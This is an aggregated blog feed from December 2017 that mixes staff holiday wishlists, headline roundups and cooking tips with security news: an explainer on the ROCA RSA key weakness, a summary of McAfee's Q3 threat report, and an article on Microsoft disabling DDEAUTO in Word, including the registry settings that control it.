We asked some of our friends around Sophos what’s at the top of their Christmas list.
1. Deck the Halls (with flags I stole)
Senior Information Security Engineer, Luke Groves
There are a couple of security related books I’m hoping Santa will bring me. I find the quieter period over Christmas is often a good time to catch up on some reading without too many distractions.
Time permitting, I’m also hoping to have a go at few online capture the flag challenges. The holiday period usually sees the release of a number of festive challenges giving everyone a chance to put their hacking skills to the test. It’s a great way to learn and it’s fun. If that sort of thing interests you then I would definitely recommend giving one of them a go.
2. Overclockin’ Around The Christmas Tree
Data Scientist, Hillary Sanders
Of the things that those close to me have the power to give, at the very top of my holiday list is just to spend time talking, walking, baking and playing board games with friends and family. But hey, if someone wants to send over a few Monero, Ethereum, or fractions of a Bitcoin my way, I’d be pretty pleased as well!
3. Let it Glow! Let it Glow! Let it Glow!
Service Engineer, Sam Cave
I’d love a new 7 piece screwdriver set for Christmas. I use them for general tech DIY as well as building things at home. Recently I finished making an oak-housed Bluetooth speaker and I’m planning some projects for the new year, but my current set is pretty worn down.
In terms of a nice piece of tech I would be really happy to find a projector under the tree this year. Out of principal I don’t own a TV, to encourage me to get out of the house and be more sociable, but it’s great being able to watch films in 1080p on a 3.5 meter screen.
Finally the last thing I am after is a heavily modified and powerful laptop that I can connect to my cloud servers with, but that is also lightweight that runs Kinux OS (Arch not PopOS) that would make me a very happy nerd this year.
4. Silent flight
Threat Researcher, Dorka Palotay
During the Christmas holidays I actually like being as tech free as possible. So, this year at the top of my Christmas list is a ticket to a trampoline park; I can do exercise (without really having to think about it) while getting to throw shapes in mid-air with my family.
We usually play a lot of board games, so a new one is always a great gift to top off the festive family time. But probably I enjoy the meals the most, having the chance to sit around a table with friends or family, eating delicious food and having great conversations.
5. I’ll be Home(ward Bound) for Christmas
Security Specialist, Greg Iddon
Follow @NakedSecurityI’ll be asking Santa why my request for a talking Golden Retriever has gone unanswered since I first made it in 1993 after watching Homeward Bound: The Incredible Journey. I appreciate that Santa is busy flying around, delivering gifts to less fortunate (man-)children than myself. However, given that we’re now in an age where little AI helpers in tiny Bluetooth speakers is the norm, is it so much to ask that I get a dog that I can have a more intelligent conversation with than half of those had around the Christmas table with inebriated members of my family?
If Santa wants his brandy and mince pies this year, he better cough-up! (Rudolf, we’re still good. I won’t skimp on the carrots).
from Naked Security http://ift.tt/2BUCUWA
The Root Virginia Pastor and His Wife Found Guilty of Scamming Millions of Dollars | Deadspin The Th
The Root Virginia Pastor and His Wife Found Guilty of Scamming Millions of Dollars | Deadspin The Thunder Finally Cut Loose | Jezebel The Real Housewives Are Bad Now | Earther This Is What Failing at Nuclear Power Looks Like | Splinter Democrats: Repeal and Replace the Tax Bill |
from Lifehacker http://ift.tt/2kTFilT
What does the security industry look like from the inside? [Chet Chat Podcast 267]
In this episode of the Chet Chat podcast, Sophos expert John Shier interviews Claudio Stahnke from Canalys Channel Forums about the view of security from the channel partner’s perspective.
John and Claudio touch on GDPR, security as a service, IoT and more.
If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.
from Naked Security http://ift.tt/2CQLAtN
Security Vulnerability in Apple's HomeKit
The story of the recent vulnerability in Apple's HomeKit.
from Schneier on Security http://ift.tt/2kUeBxz
Wednesday, December 20, 2017
Deadspin Dan Le Batard Went For Rob Manfred’s Neck | Jezebel They Should Have Let the Teens Roast Iv
Deadspin Dan Le Batard Went For Rob Manfred’s Neck | Jezebel They Should Have Let the Teens Roast Ivanka | Splinter Roleplaying Jail in Iowa With America’s Biggest Prison Fan | Earther The Amazing Earth Science Behind The Last Jedi’s New Mineral World | Very Smart Brothas The Otis Effect: 7 Things That Were Never the Same After the Star Left |
from Lifehacker http://ift.tt/2ksweFc
When to Use Natural and Quick Release When Cooking With Your Instant Pot
The Instant Pot is a table-top multi-cooker with a lot of functions, but its pressure cooking ability is what makes it indispensable for making flavor-packed soups, collagen-rich cuts of meat, and even custardy cheesecakes in super short order. It does, however, have a bit of “black box” mystique about it; food goes in, the Instant Pot is sealed and locked, and—after some period of time—the food comes out, ready to munch on.
Before you can take your meal out, or even open the pot, the pressure has to be released. You can either release it immediately by switching the release valve from “sealing” to “venting” or you can let the Instant Pot de-pressurize on its own, which can take anywhere from five to 25 minutes. During this time, the Instant Pot will switch over to its “keep warm” setting, which may continue to cook the food. (Both methods are super easy, but the above video can walk you through each one.)
Advertisement
Quick release should be used when you need to get that food out fast, i.e., if you’re dealing with easily overcooked proteins (like seafood) or delicate, quick-cooking vegetables (like corn or bok choy). The natural release is mainly used to keep your kitchen counters a bit cleaner. The pressure inside the Instant Pot can cause foods with a lot of liquid to foam, and that foam can shoot out in a most alarming fashion, so use this kind of release for soups, stews, or porridges. If you don’t want to wait 25 minutes (or are worried about food overcooking) let the Instant Pot release naturally for 10 minutes and then do a quick release to get that last bit of pressure out of there.
from Lifehacker http://ift.tt/2BnZmb9
Deadspin Bert Emanuel, Who Started All The Trouble, Can Fix The NFL’s Catch Rule | Jezebel E!
Deadspin Bert Emanuel, Who Started All The Trouble, Can Fix The NFL’s Catch Rule | Jezebel E! News Refused to Pay Catt Sadler As Much As Her Male Co-Host, So She Fucking Quit | The Root All I Want for Christmas Is This California Woman’s Weed Fortress of White Privilege | Earther There’s Now a Place in the U.S. Just for Gazing at the Stars | Splinter Doug Jones Supporter’s Casual Comment Prompts Ridiculous Alabama Voter Fraud Probe |
from Lifehacker http://ift.tt/2CLXYLI
Tuesday, December 19, 2017
Adequate Man Could Santa Claus Defeat Godzilla?
Adequate Man Could Santa Claus Defeat Godzilla? | Jezebel Former Employees Say Morgan Spurlock’s Production Company Was ‘Fratty Boys’ Club’ | Splinter Here Is the Awful Pep Talk Ziff Davis Gave to Mashable After Gutting Its Staff | Earther What the GOP Tax Bill Means for Climate, Energy, and the Environment | The Root From an Ex-Neoliberal: Why Ta-Nehisi Coates Keeps Talking About White Supremacy |
from Lifehacker http://ift.tt/2oO2cQN
Happy holidays – and don’t get scammed! [VIDEO]
Looking for digestible, not-too-technical holiday season security advice?
Here’s a video that gives you some handy tips that you can use yourself, or pass on to friends and family so they don’t get scammed while they’re supposed to be enjoying themselves.
(Can’t see the video directly above this line? Watch on Facebook instead.)
Note. With most browsers, you don’t need a Facebook account to watch the video, and if you do have an account you don’t need to be logged in. If you can’t hear the sound, try clicking on the speaker icon in the bottom right corner of the video player to unmute.
from Naked Security http://ift.tt/2kmgpQp
Deadspin Everything About The Telegraph’s Justin Gatlin Investigation Is Nuts | Jezebel Meryl Streep
Deadspin Everything About The Telegraph’s Justin Gatlin Investigation Is Nuts | Jezebel Meryl Streep to Rose McGowan: ‘I Didn’t Know’ About Harvey Weinstein | The Grapevine ‘He Looks Like He Smoked a Blunt and Drank a 40’: TV Anchor Apologizes Over Comments Made After Diddy’s Offer to Buy NFL Team | Splinter Matt Damon Is Having a #NotAllMen Meltdown | Earther Meet the Scientists Fighting to Keep Amazonian Manatees Afloat |
from Lifehacker http://ift.tt/2BetLc3
The Concourse A List Of Some Of The Times The Last Jedi Told The Older Star Wars Movies To Eat Shit
The Concourse A List Of Some Of The Times The Last Jedi Told The Older Star Wars Movies To Eat Shit | Splinter Time To Make Life Hard For The Rich | Very Smart Brothas Cornel West Seems to Believe Ta-Nehisi Coates Is Writing From the Sidelines, but Sidelines Don’t Exist for Black People | The Slot Trump Judicial Nominee Withdraws After Embarrassing Hearing | Earther We’ll All Be Eating Cactus in the Future Thanks to Climate Change |
from Lifehacker http://ift.tt/2CYgYHN
Monday, December 18, 2017
Why cryptography is much harder than software engineers think
The recent ROCA vulnerability (CVE-2017-15361) raises some important issues about the design of secure cryptographic software. The vulnerability is not in this case an obvious coding error such as a buffer overflow, or the use of a poor quality random number generator.
In this case, it arose from what probably seemed like a reasonable software engineering decision. To understand this in detail requires some pretty complex mathematics. For that, I refer you to the paper that details the flaw along with the exploit, which you can download here.
In summary, the researchers studied the statistical properties of a large sample of public keys. These are not normally easy to obtain, but the Estonian government had set up a public directory, associated with their national ID card. Since, by definition, these are public keys that’s a perfectly reasonable thing to do. Recall that there is a corresponding private key which is of course not disclosed. In theory, it’s almost impossible to derive the private key from the public key unless enormous amounts of computer time are expended.
Researchers analyzed the statistical properties of these public keys. They found that the keys were not truly random, as they should be. This meant that it was possible to derive the private key from the public key in days, rather than the expected thousands of years.
Prime suspects
How did these weak keys come to be generated? The issue lies with the RSA algorithm which lies at the heart of public key cryptography. Recall that the public and private keys are generated from very large prime numbers. Five is a prime number (it can be divided only by itself and 1). Six is not (it can be divided by 1,2,3 and 6).
The RSA algorithm best practice implementation requires that these primes (which can contain thousands of digits) have certain additional properties, which means that not just ANY large prime number will do.
The tests required to establish the suitability of the primes can be computationally expensive. Consequently some shortcuts can be taken to speed the process up. In the case of the Infineon library associated with the vulnerability, these ‘optimized’ tests favored the selection of certain prime numbers, whose digits contained patterns that the researchers could pick up through their statistical analysis.
Therefore the primes chosen to create the public/private key pairs were chosen from a much smaller set of primes where the efficient test could quickly determine that they were suitable. They were still huge primes, of course, but not truly random primes.
The major key
The researchers could exploit this lack of true randomness. Because they had inferred the patterns within the primes, they could use this knowledge, along with attack known as ‘Coppersmith’s algorithm’ to efficiently derive the private key from the public key.
Infineon are highly unlikely to be alone in exploiting this technique for efficiency. The researchers examined some other publicly available databases of public keys. This is what the researchers said about keys generated by Trusted Platform Modules (TPMs). A TPM is a hardware device used to generate and manage keys securely.
We analyzed a sample of 41 different laptop models equipped with TPM chips…. All chips [from]… 2013 or later were vulnerable, including both TPM 1.2 and TPM 2.0.
TPM devices have very limited computational resources. Consequently, the code they use to generate and test random primes must be heavily optimized. This matters because the keys generated by TPMs are often used to support full disk encryption systems such as Microsoft’s BitLocker. If the keys are weak, an attacker can potentially recover the encrypted data.
The researchers point out that obtaining large-scale databases of public keys is not easy. Consequently there could be a lot of weak keys out there that have not yet been identified. Recall that Infineon used a particular ‘shortcut’ to optimize the tests for candidate primes. Other vendors may have used different shortcuts that expose their generated keys to a similar weakness.
Without a database of public keys all generated by the same algorithm, it’s hard to tell whether a specific key is weak. The researchers have a test for Infineon-generated keys, but for other vendors, presumably with different algorithmic shortcuts, the test would differ. This may therefore be a more widespread problem.
Most software engineers are not well-versed on cryptographic design, which requires strengths in both math and statistics. In writing the code that introduced the flaw, the engineers probably took some existing implementation and adapted it, based on reasonable considerations of efficiency – they were constrained for resource and made what seemed like a sound decision. Unfortunately, in doing so they introduced a subtle but critical flaw.
The challenge of implementation
It would have been possible to detect this through automated tests against a large set of generated keys. There are established algorithms for testing how truly random a set of supposedly random numbers actually is. Keys produced by this flawed algorithm should have failed this test.
But this vulnerability highlights how hard cryptography is to implement securely. There is no simple test to say that an implementation is intrinsically secure. Instead, security must be implemented by design. Open source implementations such as OpenSSL have the huge advantage that the code base can be publicly audited by security professionals. Indeed, as far as we know, keys generated by OpenSSL are cryptographically secure. However, closed platform implementations such as the Infineon TPM code are not auditable.
Note that the researchers did NOT reverse-engineer the Infineon devices. They merely examined the generated public keys for statistical anomalies and from these were able to infer the cryptographic weakness. Had the code been in the public domain this weakness may well have been discovered through code auditing. So – if your security depends on vendor-supplied ‘black boxes’ – be very careful. As this incident shows, security through obscurity is no security at all.
from Help Net Security http://ift.tt/2yVHWwo
Exploits and fileless malware drive record new malware surge
McAfee released its McAfee Labs Threat Report: December 2017, examining the growth and trends of new malware, ransomware, and other threats in Q3 2017.
McAfee Labs saw malware reach an all-time high of 57.6 million new samples – four new samples per second – featuring developments such as new fileless malware using malicious macros, a new version of Locky ransomware dubbed Lukitus, and new variations of the banking Trojans Trickbot and Emotet. Threats attempting to exploit Microsoft technology vulnerabilities were very prominent despite the fact that the platform vendor addressed these issues with patches as early as the first quarter of 2017.
“The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist. “Although attackers will always seek ways to use newly developed innovations and established platforms against us, our industry perhaps faces a greater challenge in the effort to influence individuals and organizations away from becoming their own worst enemies.”
Known vulnerabilities exploited
The third quarter of 2017 saw cybercriminals continue to take advantage of Microsoft Office vulnerabilities such as CVE-2017-0199, which took advantage of a vulnerability within both Microsoft Office and WordPad to allow remote code execution through specially crafted files. To execute this attack, many took advantage of a tool available via GitHub offering an easy route to creating a backdoor attack without complex configuration.
New variations of the Trickbot banking Trojan featured code that embedded the EternalBlue exploit responsible for the massive WannaCry and NotPetya ransomware outbreaks in Q2. Despite Microsoft’s continued efforts to counter EternalBlue with security patches, the new Trickbot authors still found the proven technique to be effective. They combined it with new features such as cryptocurrency theft and new delivery methods, and made these new Trickbot versions the most active banking Trojans in Q3.
“Once vulnerabilities are discovered and disclosed ‘into the wild,’ or the hacker community, they present a blueprint for malicious parties seeking to develop sophisticated threats that exploit them,” said Steve Grobman, CTO at McAfee. “The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax. Only by investing more in the discovery and remediation of cyber vulnerabilities can technology vendors, governments, and business enterprises hope to gain a step on the cybercriminals working furiously to uncover and take advantage of them.”
Fileless threats
Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%. Very prominent in this category was the Emotet banking Trojan, which spread around the world through large spamming campaigns, and lured users into downloading Microsoft Word documents. This act inadvertently activates a PowerShell macro that downloads and installs the malware on their systems.
“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”
Lukitus ransomware
One of the key developments in the ransomware space was the emergence of Lukitus, a new version of Locky ransomware. The ransomware was distributed by more than 23 million spam emails within the first 24 hours of the attack. Overall in the category, new ransomware samples increased by 36%. The number of total ransomware samples has grown 44% in the past four quarters to 12.3 million samples.
DragonFly: New industries, new objectives
The McAfee Advanced Threat Research team found that DragonFly 2.0, the malware discovered earlier in 2017 in the energy sector, has targeted organizations beyond original discoveries, including the pharmaceutical, financial services, and accounting industries. These attacks were initiated through spear-phishing emails, luring recipients to click on links that download the Trojan and provide attackers with network access.
“The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer. “The intellectual property and insider insights they obtain upon gaining access to targeted sectors is of tremendous economic value.”
Q3 2017 threat activity
Security incidents. McAfee Labs counted 263 publicly disclosed security incidents in Q3, a decrease of 15% from Q2. More than 60% of all publicly disclosed security incidents in Q3 took place in the Americas.
Vertical industry targets. The health and public sectors accounted for more than 40% of total incidents in Q3.
- North America. Health sector attacks continued to lead vertical sectors in Q3 security incidents.
- Asia. Public sector, followed by technology and individual attacks led in reported Q3 incidents.
- Europe, Oceana and Africa. Public sector attacks led reported Q3 incidents.
Attack vectors. Account hijacking led disclosed attack vectors, followed by leaks, malware, DDoS, and targeted attacks.
Mobile malware. Total mobile malware continued to grow, reaching 21.1 million samples. New mobile malware increased by 60% from Q2, largely due to a rapid increase in Android screen-locking ransomware.
Malware overall. New malware samples increased in Q3 to 57.5 million, a 10% increase. The total number of malware samples grew 27% in the past four quarters to almost 781 million samples.
Fileless malware. While JavaScript malware growth slowed by 26% in Q3, PowerShell malware more than doubled with 119%.
Ransomware. New ransomware samples rose by 36% in Q3. The total number of new ransomware samples grew 14% in the last quarter to 12.2 million samples.
Mac malware. Mac OS malware samples increased by 7% in Q3.
Macro malware. Total macro malware continued to grow, increasing by 8% in Q3.
Spam campaigns. The Gamut botnet remains the most prevalent spamming botnet during Q3, with the Necurs botnet a close second. Necurs proliferated several Ykcol (Locky) ransomware campaigns throughout the quarter with themes such as “Status Invoice,” “Your Payment,” and “Emailing: [Random Numbers] JPG.”
from Help Net Security http://ift.tt/2AXg2lA
Microsoft Word slams the door on DDEAUTO malware attacks
Remember the DDEAUTO vulnerability?
DDEAUTO, short for automatic dynamic data exchange, is a command you can put right inside the data of an Office file to get it to pull data out of another file.
According to Microsoft’s official documentation, DDEAUTO is only supposed to work within the same app, or between two apps that are already active:
DDEAUTO argument-1 argument-2 [argument-3] [switches] [. . .] Description: For information copied from another application, this field links that information to its original source file using DDE and is updated automatically. The application name shall be specified in argument-1; this application must be running.
For example, you could have a Word report that pulled in the latest sales figures “live” from an Excel spreadsheet, provided you had both Word and Excel open already.
But researchers found that there was an undocumented feature in the DDEAUTO function whereby it could start any application already installed on your computer, such as the command shell CMD.EXE.
Having fired up this second program, the DDEAUTO function could be used to run a script specified inside the DDEAUTO command itself, instead of reading data from an existing file, as intended.
In other words, a crook could embed malware, in the form of a Powershell or other script, right in the data of a Word document or an Excel spreadsheet, and just opening the file would launch the malware command – without waiting for you to open an attachment, download a file or enable Word macros.
In short, remote code execution, or RCE.
Fortunately, you’d get two DDE warnings before the malicious script would run, but they weren’t warnings that anyone had previously learned to associate with malware.
First, this:
Followed by something along these lines:
Microsoft demurred over fixing this bug, describing it as a by-design feature – which it was, except for failing to enforce the restriction stated in the Microsoft Developer Network (MSDN) documentation, namely that “[the other] application must [already] be running”.
Cybercrooks quickly learned to exploit DDEAUTO as yet another route for introducing malware – one that few users were trained to look out for and avoid.
Sophos products block DDE attacks under the following names:
- CXmail/OffDDE-*: emailed attachments and booby-trapped messages.
- Troj/RtfDDE-*: booby-trapped RTF files.
- Troj/DocDl-DJV: DDE attacks that try to download additional malware.
Change of heart
The good news is that Microsoft seems to have had a change of heart, at least in part.
I didn’t notice the details until now – as a macOS user, I get away without needing either Windows or Office in daily life! – but it turns out that downloads published in the December 2017 Update Tuesday included ADV170021, a so-called Microsoft Office Defense in Depth Update:
Microsoft has released an update for Microsoft Office that provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word.
Unfortunately, this isn’t a complete patch against your DDEAUTO problems, because it’s specific to the Word app, rather than generic to all the apps in the Office suite.
If you want to block DDEAUTO in other Office apps you will need to follow the app-specific registry hacks detailed in the Microsoft Office Security Advisory 4053440.
Nevertheless, this ADV170021 patch is a welcome change that introduces the following registry entry for Word:
HKEY_CURRENT_USER\Software\Microsoft\Office\<version#>\Word\Security\AllowDDE = 0
The default value, as indicated above, is zero, meaning that DDE is turned off altogether.
If that doesn’t work for you, you can revert to the old, insecure behaviour by setting AllowDDE = 2, allowing all DDEAUTO commands issued from inside Word.
Fot a middle ground, AllowDDE = 1 sets the as-originally-documented behaviour, so that DDEAUTO is allowed, but only between apps that are already running.
That means you can still hook your Word documents up to Excel spreadsheets for financial and similar data, but crooks can’t send in documents from outside to trick Word into running dangerous external programs such as CMD.EXE and PowerShell.
from Naked Security http://ift.tt/2BbaFTS